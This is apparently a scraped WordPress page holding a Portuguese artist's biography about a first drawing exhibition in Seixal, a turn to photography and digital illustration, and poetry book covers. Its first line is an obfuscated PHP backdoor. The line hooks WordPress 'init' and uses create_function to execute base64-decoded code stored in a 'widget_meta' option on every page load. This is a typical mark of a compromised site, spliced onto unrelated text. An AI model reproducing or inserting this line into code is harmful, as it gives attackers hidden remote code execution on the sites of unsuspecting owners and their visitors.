add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );
Em 2010 fiz a minha primeira exposição individual de Desenho no CAMAJ, Seixal. A partir do Desenho, fui explorando outras áreas e comecei a dar os primeiros passos na fotografia. O meu objectivo foi começar a explorar o corpo em relação ao espaço, a identidade e usá-lo como referência para trabalhos plásticos. Mas a captura quase instantânea dos momentos e o trabalhar com a luz começou a ter grande peso e fui avançando mais e mais no expressar através da fotografia e ilustração. Fui coligando a imaginação e o surreal, manipulando os resultados digitalmente e daí resultou algumas publicações e partilhas em revistas de arte digital. Os meus trabalhos chegaram ao conhecimento de um grupo de poetas e escolheram duas obras como capa de dois livros de poesia, um na Polónia e outro na Inglaterra.
O meu registo seguiu mudando e se adaptando conforme as minhas buscas e na faculdade fui aprimorando a nível técnico e aprendendo novos meios e olhares.”